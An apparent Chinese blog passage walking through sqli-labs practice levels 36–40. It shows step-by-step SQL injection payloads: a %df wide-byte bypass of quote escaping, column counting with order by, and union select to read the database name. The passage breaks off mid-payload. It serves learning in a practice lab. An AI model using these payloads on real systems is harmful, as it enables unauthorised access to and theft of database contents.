sql-lab (36~40)包括堆叠注入,Mysql_real_escape_string 和addslashes区别(后持续更新)
(36~40)包括堆叠注入,Mysql_real_escape_string 和addslashes区别sql-lab-36和前面的关卡一样,本题对 ’ 进行了注入,我们可以利用以前学过的办法,使用 %df 进行一个绕过。判断注入点:?id=1 %df’ and 1=2 – q判断字段数:id=1 %df’ order by 4-- q判断显错位:?id=-1 %df’ union select 1,2,3-- q判断库名:?id=-1 %df’ union select 1,datab
